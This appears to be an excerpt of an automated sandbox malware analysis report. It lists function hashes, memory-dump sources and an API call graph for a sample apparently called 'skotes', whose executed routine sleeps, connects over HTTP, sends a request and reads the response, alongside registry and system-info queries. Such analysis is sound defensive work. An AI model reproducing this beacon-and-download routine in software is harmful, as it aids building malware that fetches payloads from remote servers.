                                                  Function 053E030A Relevance: .1, Instructions: 103COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2196211083.00000000053E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 053E0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_53e0000_file.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 6c61a40256c828499d3e225b126812a6802c498611707dc3ecf1d913b04c00fa
                                                  • Instruction ID: c6b9712f536b5c3dded784955a7443e047830a5a64a4f635634dd09ff9b15087
                                                  • Opcode Fuzzy Hash: 6c61a40256c828499d3e225b126812a6802c498611707dc3ecf1d913b04c00fa
                                                  • Instruction Fuzzy Hash: 7E118FFB10C161BFB245C6C13B59AFB67AFE5D6730331881BF443D4982D2984E6A5932
                                                  Function 053E02F2 Relevance: .1, Instructions: 100COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2196211083.00000000053E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 053E0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_53e0000_file.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 8849aaff97b7f360dbc988f0f8e66a9ab2355a461456629de32a3d18d4c6af0e
                                                  • Instruction ID: 7c914d1cfafe23e505915d0eab63ca00d22f8cbba4d6bb03cc7f64db9c9ad14f
                                                  • Opcode Fuzzy Hash: 8849aaff97b7f360dbc988f0f8e66a9ab2355a461456629de32a3d18d4c6af0e
                                                  • Instruction Fuzzy Hash: 121118AB10C131BE7145C5C22B58AFA66AFE1D57313318827F807D4C82E3D84F6E2932
                                                  Function 053E0394 Relevance: .1, Instructions: 95COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2196211083.00000000053E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 053E0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_53e0000_file.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 02ecdb61d2cffae42f29991e4c1e3bcc8be232490a688738d3340257f4128878
                                                  • Instruction ID: bbee410f02291cf62fcefca86273ea6b05440e17498ee7254d515b581b3365d1
                                                  • Opcode Fuzzy Hash: 02ecdb61d2cffae42f29991e4c1e3bcc8be232490a688738d3340257f4128878
                                                  • Instruction Fuzzy Hash: 371191BB10C131BE7249C1D12B59AFAABAFE4C57303318427F442D4C82D3D84E9A5972
                                                  Function 053E0371 Relevance: .1, Instructions: 93COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2196211083.00000000053E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 053E0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_53e0000_file.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: cd95e6d2a2a36b8b1736825574e007026c6ad732387699291aa5915323eded4c
                                                  • Instruction ID: 2a79ae2ac43a962066f69e5be1f9b30345da983600fdaad4aa42bdaabe30281c
                                                  • Opcode Fuzzy Hash: cd95e6d2a2a36b8b1736825574e007026c6ad732387699291aa5915323eded4c
                                                  • Instruction Fuzzy Hash: 3B1157EB10C031BEB249C5C22B18AFA57AFE1D57307318827F802D4882D2D94EAA1932
                                                  Function 053E033D Relevance: .1, Instructions: 85COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2196211083.00000000053E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 053E0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_53e0000_file.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 3372e3f23c5e962038b9e63a4cd6dbe28e92678999b3fecdfd536644c011d7dd
                                                  • Instruction ID: 071f9a96ff07adbb81c6dd79369a824a356ea686c16dec264262e78ae11a75c1
                                                  • Opcode Fuzzy Hash: 3372e3f23c5e962038b9e63a4cd6dbe28e92678999b3fecdfd536644c011d7dd
                                                  • Instruction Fuzzy Hash: 10014CFB10C135BE7245C1C12B59AFA57AFE4C5B703318827F802E5C86D3C94EAA1832
                                                  Function 053E03B0 Relevance: .1, Instructions: 85COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2196211083.00000000053E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 053E0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_53e0000_file.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 1bcaafcd87e7fb971b60b5b5edb030258c9e5394d3c7e991190344f86c00268e
                                                  • Instruction ID: 65c4a1ead7024922ad89e7a89a1e45d219c47f9a656566706b19b640d45c3ee2
                                                  • Opcode Fuzzy Hash: 1bcaafcd87e7fb971b60b5b5edb030258c9e5394d3c7e991190344f86c00268e
                                                  • Instruction Fuzzy Hash: 81019EEB10C170AE7209D1C13BA9EFB27EED5C5B30331C957F442D5886D2D84EAA5932
                                                  Function 053E0354 Relevance: .1, Instructions: 83COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2196211083.00000000053E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 053E0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_53e0000_file.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 03141fe3900f9d261423673a6681466cad9f3b388d401fb0ee41c57508eecf9d
                                                  • Instruction ID: fc73246313a351783065401a5fbe2837110673d74d7b9672060c4a2f4ebf1f00
                                                  • Opcode Fuzzy Hash: 03141fe3900f9d261423673a6681466cad9f3b388d401fb0ee41c57508eecf9d
                                                  • Instruction Fuzzy Hash: 990192FB10C070BE7245C1C13F59AFA67AED5C57303308857F442D4882D2D90E6E5932
                                                  Function 053E03E8 Relevance: .0, Instructions: 47COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2196211083.00000000053E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 053E0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_53e0000_file.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: a4c4bce4805ae53c4183eaa4150f0330f23cc801d3a456c7deaf149fc5f9231c
                                                  • Instruction ID: 704ae9fcd966a3f54f82f6fa4155ed7b9f5ef4801947abfe1db6be580ccc50e5
                                                  • Opcode Fuzzy Hash: a4c4bce4805ae53c4183eaa4150f0330f23cc801d3a456c7deaf149fc5f9231c
                                                  • Instruction Fuzzy Hash: C7F0A5BB10C121AE7154C5823B69EFA63AEE5D4B31371C82BF442D0846D29989AA5932
                                                  Function 053E03FC Relevance: .0, Instructions: 46COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2196211083.00000000053E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 053E0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_53e0000_file.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: ee6ce1c8c4185ecdf7121967be944c07938834c91d814fe0b3b70aabbc2048fe
                                                  • Instruction ID: a805e58cb8b2733e6bc2d48eb10d30336102a519d9b42e42144a6a81de0c90bc
                                                  • Opcode Fuzzy Hash: ee6ce1c8c4185ecdf7121967be944c07938834c91d814fe0b3b70aabbc2048fe
                                                  • Instruction Fuzzy Hash: EDF0827760C1219E6218D5923769AFA63EEE4C0730731843BF043C2842D799456E5932
                                                  Function 053E0425 Relevance: .0, Instructions: 29COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2196211083.00000000053E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 053E0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_53e0000_file.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 83e3aacd809fb4c2bbb1908f0021f809fa4c4363b5d4e19559961783dd1b1b1b
                                                  • Instruction ID: a2fe4d791ae68efe68f7f3d810bbad695d17a997468dddae5f9616139cd1d08b
                                                  • Opcode Fuzzy Hash: 83e3aacd809fb4c2bbb1908f0021f809fa4c4363b5d4e19559961783dd1b1b1b
                                                  • Instruction Fuzzy Hash: F9D017BB10C020AE7154D5C63B2DAFA63FEE5D0730732C82BF082C0882D69849AE5D33
                                                  Function 053E043E Relevance: .0, Instructions: 25COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2196211083.00000000053E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 053E0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_53e0000_file.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 8a6b01746541b4a9e822988fdbc15703aef0a553f8e4405e685b3f0a6fee2481
                                                  • Instruction ID: 85e474458748ef12fbba224601ab848e7d8b920fce9c9221b1f78263f1e3c539
                                                  • Opcode Fuzzy Hash: 8a6b01746541b4a9e822988fdbc15703aef0a553f8e4405e685b3f0a6fee2481
                                                  • Instruction Fuzzy Hash: 17D0C9BB10C020BD30A4D5823B1DBFB63AEE0D0A31371C817F442D1C82E689496D6971

                                                  Non-executed Functions

                                                  Function 053E058C Relevance: 1.4, Strings: 1, Instructions: 192COMMON
                                                  Download Yara Rule
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2196211083.00000000053E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 053E0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_53e0000_file.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: KC
                                                  • API String ID: 0-1422302447
                                                  • Opcode ID: 7d319a7fb1c0caaa8c2c11ea6a10d7916f8035d10624613884737bd6a3853f4b
                                                  • Instruction ID: c5bab1981966980baec37b7d26d41380137e82d081df5162cd50ce6704b3c390
                                                  • Opcode Fuzzy Hash: 7d319a7fb1c0caaa8c2c11ea6a10d7916f8035d10624613884737bd6a3853f4b
                                                  • Instruction Fuzzy Hash: 174191EB24C231BD7106C5522F5CAFB6BAEE5C7730334843AF846C69C2E2D84E4A5172

                                                  Execution Graph

                                                  Execution Coverage:7.3%
                                                  Dynamic/Decrypted Code Coverage:0%
                                                  Signature Coverage:10.7%
                                                  Total number of Nodes:347
                                                  Total number of Limit Nodes:10
                                                  execution_graph 11178 d96629 11179 d964c7 2 API calls 11178->11179 11180 d9663a 11179->11180 10894 d6e0c0 recv 10895 d6e122 recv 10894->10895 10896 d6e157 recv 10895->10896 10897 d6e191 10896->10897 10898 d6e2b3 10897->10898 10903 d7c6ac 10897->10903 10910 d7c452 10903->10910 10905 d6e2ee 10906 d7c26a 10905->10906 10907 d7c292 10906->10907 10908 d7c274 10906->10908 10907->10907 10908->10907 10927 d7c297 10908->10927 10911 d7c4a8 10910->10911 10913 d7c47a 10910->10913 10911->10913 10916 d7cf6b 10911->10916 10913->10905 10914 d7c4fd __Xtime_diff_to_millis2 10914->10913 10915 d7cf6b _xtime_get GetSystemTimePreciseAsFileTime 10914->10915 10915->10914 10917 d7cf7a 10916->10917 10918 d7cf87 __aulldvrm 10916->10918 10917->10918 10920 d7cf44 10917->10920 10918->10914 10923 d7cbea 10920->10923 10924 d7cc07 10923->10924 10925 d7cbfb GetSystemTimePreciseAsFileTime 10923->10925 10924->10918 10925->10924 10930 d62ae0 10927->10930 10929 d7c2ae std::_Throw_future_error 10929->10908 10936 d7bedf 10930->10936 10932 d62aff 10932->10929 10934 d96cf6 10935 d62af4 10935->10932 10939 d98bec 10935->10939 10947 d7cc31 10936->10947 10940 d98bf1 10939->10940 10943 d98bfc 10940->10943 10951 d9d634 10940->10951 10958 d965ed 10943->10958 10944 d9d867 RtlAllocateHeap 10945 d9d87a __dosmaperr 10944->10945 10946 d98c2f 10944->10946 10945->10934 10946->10944 10946->10945 10948 d7cc3f InitOnceExecuteOnce 10947->10948 10950 d7bef2 10947->10950 10948->10950 10950->10935 10952 d9d640 10951->10952 10953 d965ed 2 API calls 10952->10953 10954 d9d69c __cftof __dosmaperr 10952->10954 10957 d9d82e 10953->10957 10954->10943 10955 d9d867 RtlAllocateHeap 10956 d9d87a __dosmaperr 10955->10956 10955->10957 10956->10943 10957->10955 10957->10956 10961 d964c7 10958->10961 10962 d964d5 10961->10962 10963 d96520 10962->10963 10966 d9652b 10962->10966 10963->10946 10971 d9a302 GetPEB 10966->10971 10968 d96535 10969 d9653a GetPEB 10968->10969 10970 d9654a 10968->10970 10969->10970 10972 d9a31c 10971->10972 10972->10968 11160 d67430 11161 d67465 shared_ptr 11160->11161 11165 d6755f shared_ptr 11161->11165 11166 d7d111 11161->11166 11163 d675ed 11163->11165 11170 d7d0c7 11163->11170 11167 d7d122 11166->11167 11168 d7d12a 11167->11168 11174 d7d199 11167->11174 11168->11163 11171 d7d0d7 11170->11171 11172 d7d17b RtlWakeAllConditionVariable 11171->11172 11173 d7d17f 11171->11173 11172->11165 11173->11165 11175 d7d1a7 SleepConditionVariableCS 11174->11175 11177 d7d1c0 11174->11177 11175->11177 11177->11167 11238 d68780 11239 d68786 11238->11239 11240 d96729 RtlAllocateHeap 11239->11240 11241 d68793 11240->11241 10828 d71ec0 10831 d71f5b shared_ptr __dosmaperr 10828->10831 10829 d6e530 7 API calls 10830 d72a26 shared_ptr std::_Xinvalid_argument 10829->10830 10831->10830 10834 d71f68 10831->10834 10839 d96729 10831->10839 10833 d7276a shared_ptr __dosmaperr 10833->10830 10833->10834 10835 d728c1 10833->10835 10834->10829 10842 d6e530 10835->10842 10837 d72933 10837->10830 10860 d65ee0 10837->10860 10867 d96672 10839->10867 10841 d9673b 10841->10833 10843 d6e576 10842->10843 10883 d6be30 10843->10883 10845 d6ea8f shared_ptr 10845->10837 10846 d6e7fe 10846->10845 10847 d6e530 7 API calls 10846->10847 10849 d6f786 10847->10849 10848 d6f982 shared_ptr 10848->10837 10849->10848 10850 d6e530 7 API calls 10849->10850 10852 d6fa63 10850->10852 10851 d6fb35 shared_ptr 10851->10837 10852->10851 10853 d96729 RtlAllocateHeap 10852->10853 10854 d6fce1 10853->10854 10855 d6e530 7 API calls 10854->10855 10857 d7063c 10855->10857 10856 d70880 shared_ptr 10856->10837 10857->10856 10858 d6e530 7 API calls 10857->10858 10859 d712e9 10858->10859 10862 d65f18 10860->10862 10861 d65ffe shared_ptr 10861->10830 10862->10861 10863 d66150 RegOpenKeyExA 10862->10863 10864 d66493 shared_ptr 10863->10864 10866 d661a3 __cftof 10863->10866 10864->10830 10865 d66243 RegEnumValueA 10865->10866 10866->10864 10866->10865 10868 d9667e 10867->10868 10870 d96685 __cftof __dosmaperr 10868->10870 10871 d9a8c3 10868->10871 10870->10841 10872 d9a8cf 10871->10872 10875 d9a967 10872->10875 10874 d9a8ea 10874->10870 10878 d9a98a 10875->10878 10877 d9a9d0 10877->10874 10878->10877 10879 d9d82f 10878->10879 10882 d9d83c 10879->10882 10880 d9d867 RtlAllocateHeap 10881 d9d87a __dosmaperr 10880->10881 10880->10882 10881->10877 10882->10880 10882->10881 10884 d6be82 10883->10884 10886 d6c22e shared_ptr 10883->10886 10885 d6be96 Sleep InternetOpenW InternetConnectA 10884->10885 10884->10886 10887 d6bf18 10885->10887 10886->10846 10888 d6bf2e HttpOpenRequestA 10887->10888 10889 d6bf4c shared_ptr 10888->10889 10890 d6bfee HttpSendRequestA 10889->10890 10892 d6c006 shared_ptr 10890->10892 10891 d6c08e InternetReadFile 10893 d6c0b5 10891->10893 10892->10891 11007 d76c70 11008 d76ca0 11007->11008 11011 d747b0 11008->11011 11010 d76cec Sleep 11010->11008 11013 d747eb 11011->11013 11024 d74e70 shared_ptr 11011->11024 11012 d74f59 shared_ptr 11012->11010 11014 d6be30 6 API calls 11013->11014 11013->11024 11023 d74843 shared_ptr __dosmaperr 11014->11023 11015 d750de shared_ptr 11035 d67d30 11015->11035 11017 d750ed 11039 d68380 11017->11039 11019 d76c46 11020 d747b0 11 API calls 11019->11020 11022 d76cec Sleep 11020->11022 11021 d6be30 6 API calls 11025 d74b62 shared_ptr 11021->11025 11022->11019 11023->11021 11023->11024 11024->11012 11024->11015 11024->11019 11025->11024 11028 d74390 11025->11028 11027 d75106 shared_ptr 11027->11010 11029 d743d2 11028->11029 11031 d74646 11029->11031 11033 d743f8 shared_ptr 11029->11033 11030 d74610 shared_ptr 11030->11024 11032 d73640 9 API calls 11031->11032 11032->11030 11033->11030 11043 d73640 11033->11043 11036 d67d96 shared_ptr __cftof 11035->11036 11037 d67ed3 GetNativeSystemInfo 11036->11037 11038 d67ed7 shared_ptr 11036->11038 11037->11038 11038->11017 11040 d683e5 shared_ptr __cftof 11039->11040 11041 d68524 GetNativeSystemInfo 11040->11041 11042 d68403 11040->11042 11041->11042 11042->11027 11044 d7367f shared_ptr __dosmaperr 11043->11044 11045 d73ba2 shared_ptr std::_Xinvalid_argument 11043->11045 11044->11045 11046 d73f42 11044->11046 11048 d73c8d 11044->11048 11045->11033 11061 d72f10 11046->11061 11050 d71ec0 11048->11050 11053 d71f5b shared_ptr __dosmaperr 11050->11053 11051 d6e530 7 API calls 11052 d72a26 shared_ptr std::_Xinvalid_argument 11051->11052 11052->11045 11053->11052 11054 d96729 RtlAllocateHeap 11053->11054 11056 d71f68 11053->11056 11055 d7276a shared_ptr __dosmaperr 11054->11055 11055->11052 11055->11056 11057 d728c1 11055->11057 11056->11051 11058 d6e530 7 API calls 11057->11058 11059 d72933 11058->11059 11059->11052 11060 d65ee0 2 API calls 11059->11060 11060->11052 11062 d72f54 11061->11062 11063 d6e530 7 API calls 11062->11063 11065 d73513 shared_ptr __dosmaperr 11063->11065 11064 d7360a shared_ptr std::_Xinvalid_argument 11064->11045 11065->11064 11066 d73c8d 11065->11066 11067 d73f42 11065->11067 11069 d71ec0 9 API calls 11066->11069 11068 d72f10 9 API calls 11067->11068 11068->11064 11069->11064 11070 d7a210 11071 d7a290 11070->11071 11077 d771d0 11071->11077 11073 d7a4be shared_ptr 11074 d7a2cc shared_ptr 11074->11073 11081 d63ee0 11074->11081 11076 d7a4a6 11079 d77211 __cftof 11077->11079 11078 d77446 11078->11074 11079->11078 11087 d62ec0 11079->11087 11082 d63f1e 11081->11082 11083 d63f48 11081->11083 11082->11076 11084 d63f58 11083->11084 11130 d62c00 11083->11130 11084->11076 11088 d62f06 11087->11088 11092 d62f6f 11087->11092 11089 d7c6ac GetSystemTimePreciseAsFileTime 11088->11089 11090 d62f12 11089->11090 11093 d6301e 11090->11093 11096 d62f1d __Mtx_unlock 11090->11096 11091 d62fef 11091->11078 11092->11091 11099 d7c6ac GetSystemTimePreciseAsFileTime 11092->11099 11094 d7c26a 5 API calls 11093->11094 11095 d63024 11094->11095 11097 d7c26a 5 API calls 11095->11097 11096->11092 11096->11095 11098 d62fb9 11097->11098 11100 d7c26a 5 API calls 11098->11100 11101 d62fc0 __Mtx_unlock 11098->11101 11099->11098 11100->11101 11102 d7c26a 5 API calls 11101->11102 11103 d62fd8 __Cnd_broadcast 11101->11103 11102->11103 11103->11091 11104 d7c26a 5 API calls 11103->11104 11105 d6303c 11104->11105 11106 d7c6ac GetSystemTimePreciseAsFileTime 11105->11106 11116 d63080 shared_ptr __Mtx_unlock 11106->11116 11107 d631c5 11108 d7c26a 5 API calls 11107->11108 11109 d631cb 11108->11109 11110 d7c26a 5 API calls 11109->11110 11111 d631d1 11110->11111 11112 d7c26a 5 API calls 11111->11112 11118 d63193 __Mtx_unlock 11112->11118 11113 d631a7 11113->11078 11114 d7c26a 5 API calls 11115 d631dd 11114->11115 11116->11107 11116->11109 11116->11113 11117 d7c6ac GetSystemTimePreciseAsFileTime 11116->11117 11120 d6315f 11117->11120 11118->11113 11118->11114 11120->11107 11120->11111 11120->11118 11121 d7bd4c 11120->11121 11124 d7bb72 11121->11124 11123 d7bd5c 11123->11120 11125 d7bb9c 11124->11125 11126 d7cf6b _xtime_get GetSystemTimePreciseAsFileTime 11125->11126 11129 d7bba4 __Xtime_diff_to_millis2 11125->11129 11127 d7bbcf __Xtime_diff_to_millis2 11126->11127 11128 d7cf6b _xtime_get GetSystemTimePreciseAsFileTime 11127->11128 11127->11129 11128->11129 11129->11123 11131 d62c0e 11130->11131 11137 d7b847 11131->11137 11133 d62c42 11134 d62c49 11133->11134 11143 d62c80 11133->11143 11134->11076 11136 d62c58 std::_Throw_future_error 11138 d7b854 11137->11138 11139 d7b873 Concurrency::details::_Reschedule_chore 11137->11139 11146 d7cb77 11138->11146 11139->11133 11141 d7b864 11141->11139 11148 d7b81e 11141->11148 11154 d7b7fb 11143->11154 11145 d62cb2 shared_ptr 11145->11136 11147 d7cb92 CreateThreadpoolWork 11146->11147 11147->11141 11149 d7b827 Concurrency::details::_Reschedule_chore 11148->11149 11152 d7cdcc 11149->11152 11151 d7b841 11151->11139 11153 d7cde1 TpPostWork 11152->11153 11153->11151 11155 d7b807 11154->11155 11156 d7b817 11154->11156 11155->11156 11158 d7ca78 11155->11158 11156->11145 11159 d7ca8d TpReleaseWork 11158->11159 11159->11156 11181 d787d0 11182 d7882a __cftof 11181->11182 11188 d79bb0 11182->11188 11184 d78854 11187 d7886c 11184->11187 11192 d643f0 11184->11192 11186 d788d9 std::_Throw_future_error 11189 d79be5 11188->11189 11198 d62ce0 11189->11198 11191 d79c16 11191->11184 11193 d7bedf InitOnceExecuteOnce 11192->11193 11194 d6440a 11193->11194 11195 d64411 11194->11195 11196 d96cbb 4 API calls 11194->11196 11195->11186 11197 d64424 11196->11197 11199 d62d1d 11198->11199 11200 d7bedf InitOnceExecuteOnce 11199->11200 11201 d62d46 11200->11201 11202 d62d51 11201->11202 11203 d62d88 11201->11203 11207 d7bef7 11201->11207 11202->11191 11214 d62440 11203->11214 11208 d7bf03 std::_Throw_future_error 11207->11208 11209 d7bf73 11208->11209 11210 d7bf6a 11208->11210 11212 d62ae0 5 API calls 11209->11212 11217 d7be7f 11210->11217 11213 d7bf6f 11212->11213 11213->11203 11227 d7b5d6 11214->11227 11216 d62472 11218 d7cc31 InitOnceExecuteOnce 11217->11218 11219 d7be97 11218->11219 11220 d7be9e 11219->11220 11223 d96cbb 11219->11223 11220->11213 11224 d96cc7 11223->11224 11225 d98bec 4 API calls 11224->11225 11226 d96cf6 11225->11226 11229 d7b5f1 std::_Throw_future_error 11227->11229 11228 d7b658 11228->11216 11229->11228 11230 d98bec 4 API calls 11229->11230 11231 d7b69f 11230->11231 11232 d793e0 11233 d79433 11232->11233 11234 d793f5 11232->11234 11235 d7d111 SleepConditionVariableCS 11234->11235 11236 d793ff 11235->11236 11236->11233 11237 d7d0c7 RtlWakeAllConditionVariable 11236->11237 11237->11233 11242 d7b92e 11243 d7b7b5 6 API calls 11242->11243 11244 d7b956 11243->11244 11245 d7b718 6 API calls 11244->11245 11246 d7b96f 11245->11246 10973 d7b8b9 10980 d7b7b5 10973->10980 10975 d7b906 10992 d7b718 10975->10992 10976 d7b8e1 Concurrency::details::_Reschedule_chore 10976->10975 10988 d7cbae 10976->10988 10979 d7b91e 10981 d7b7c1 Concurrency::details::_Reschedule_chore 10980->10981 10982 d7b7f2 10981->10982 10983 d7c6ac GetSystemTimePreciseAsFileTime 10981->10983 10982->10976 10984 d7b7d6 10983->10984 11002 d62b10 10984->11002 10986 d7b7dc __Mtx_unlock 10987 d62b10 5 API calls 10986->10987 10987->10982 10989 d7cbcc 10988->10989 10990 d7cbbc TpCallbackUnloadDllOnCompletion 10988->10990 10989->10975 10990->10989 10993 d7b724 Concurrency::details::_Reschedule_chore 10992->10993 10994 d7b77e 10993->10994 10995 d7c6ac GetSystemTimePreciseAsFileTime 10993->10995 10994->10979 10996 d7b739 10995->10996 10997 d62b10 5 API calls 10996->10997 10998 d7b73f __Mtx_unlock 10997->10998 10999 d62b10 5 API calls 10998->10999 11000 d7b75c __Cnd_broadcast 10999->11000 11000->10994 11001 d62b10 5 API calls 11000->11001 11001->10994 11003 d62b1c 11002->11003 11004 d62b1a 11002->11004 11005 d7c26a 5 API calls 11003->11005 11004->10986 11006 d62b22 ___std_exception_copy 11005->11006 11006->10986

                                                  Executed Functions

                                                  Function 00D6BE30 Relevance: 21.3, APIs: 6, Strings: 6, Instructions: 313networksleepfileCOMMON
                                                  Download Yara Rule

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 766 d6be30-d6be7c 767 d6be82-d6be86 766->767 768 d6c281-d6c2a6 call d780c0 766->768 767->768 769 d6be8c-d6be90 767->769 774 d6c2d4-d6c2ec 768->774 775 d6c2a8-d6c2b4 768->775 769->768 771 d6be96-d6bf2a Sleep InternetOpenW InternetConnectA call d77a00 call d65c10 769->771 799 d6bf2e-d6bf4a HttpOpenRequestA 771->799 800 d6bf2c 771->800 776 d6c2f2-d6c2fe 774->776 777 d6c238-d6c250 774->777 779 d6c2b6-d6c2c4 775->779 780 d6c2ca-d6c2d1 call d7d663 775->780 782 d6c304-d6c312 776->782 783 d6c22e-d6c235 call d7d663 776->783 784 d6c256-d6c262 777->784 785 d6c323-d6c33f call d7cff1 777->785 779->780 787 d6c34f-d6c354 call d96c6a 779->787 780->774 782->787 790 d6c314 782->790 783->777 791 d6c268-d6c276 784->791 792 d6c319-d6c320 call d7d663 784->792 790->783 791->787 798 d6c27c 791->798 792->785 798->792 804 d6bf4c-d6bf5b 799->804 805 d6bf7b-d6bfea call d77a00 call d65c10 call d77a00 call d65c10 799->805 800->799 807 d6bf71-d6bf78 call d7d663 804->807 808 d6bf5d-d6bf6b 804->808 818 d6bfee-d6c004 HttpSendRequestA 805->818 819 d6bfec 805->819 807->805 808->807 820 d6c006-d6c015 818->820 821 d6c035-d6c05d 818->821 819->818 824 d6c017-d6c025 820->824 825 d6c02b-d6c032 call d7d663 820->825 822 d6c08e-d6c0af InternetReadFile 821->822 823 d6c05f-d6c06e 821->823 828 d6c0b5 822->828 826 d6c084-d6c08b call d7d663 823->826 827 d6c070-d6c07e 823->827 824->825 825->821 826->822 827->826 832 d6c0c0-d6c170 call d94250 828->832
                                                  APIs
                                                  • Sleep.KERNELBASE(000005DC), ref: 00D6BEB8
                                                  • InternetOpenW.WININET(00DB8DC8,00000000,00000000,00000000,00000000), ref: 00D6BEC7
                                                  • InternetConnectA.WININET(00000000,?,00000050,00000000,00000000,00000003,00000000,00000001), ref: 00D6BEEC
                                                  • HttpOpenRequestA.WININET(?,00000000), ref: 00D6BF36
                                                  • HttpSendRequestA.WININET(?,00000000), ref: 00D6BFF6
                                                  • InternetReadFile.WININET(?,?,000003FF,?), ref: 00D6C0A8
                                                  • InternetCloseHandle.WININET(?), ref: 00D6C187
                                                  • InternetCloseHandle.WININET(?), ref: 00D6C18F
                                                  • InternetCloseHandle.WININET(?), ref: 00D6C197
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000006.00000002.3378692573.0000000000D61000.00000040.00000001.01000000.00000007.sdmp, Offset: 00D60000, based on PE: true
                                                  • Associated: 00000006.00000002.3378621502.0000000000D60000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                  • Associated: 00000006.00000002.3378692573.0000000000DC2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                  • Associated: 00000006.00000002.3378806124.0000000000DC9000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                  • Associated: 00000006.00000002.3378866908.0000000000DCB000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                  • Associated: 00000006.00000002.3378866908.0000000000F4C000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                  • Associated: 00000006.00000002.3378866908.000000000102D000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                  • Associated: 00000006.00000002.3378866908.000000000105A000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                  • Associated: 00000006.00000002.3378866908.0000000001067000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                  • Associated: 00000006.00000002.3378866908.0000000001075000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                  • Associated: 00000006.00000002.3379425764.0000000001076000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                  • Associated: 00000006.00000002.3379749901.000000000120F000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                  • Associated: 00000006.00000002.3379849356.0000000001211000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_6_2_d60000_skotes.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: Internet$CloseHandle$HttpOpenRequest$ConnectFileReadSendSleep
                                                  • String ID: 8HJUeIfzLo==$8HJUeMD Lq5=$RE1NXF==$RmNn$invalid stoi argument$stoi argument out of range
                                                  • API String ID: 2167506142-2254971868
                                                  • Opcode ID: 00c1335ed0b2aa781634118692d474fea64d90b33bc755316ca7a9f46ca56be0
